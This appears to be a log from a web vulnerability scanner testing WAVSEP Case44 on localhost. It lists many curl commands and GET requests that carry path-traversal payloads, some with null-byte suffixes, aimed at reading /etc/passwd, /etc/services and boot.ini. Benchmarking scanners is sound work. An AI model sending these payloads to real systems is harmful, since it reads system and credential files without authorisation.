curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
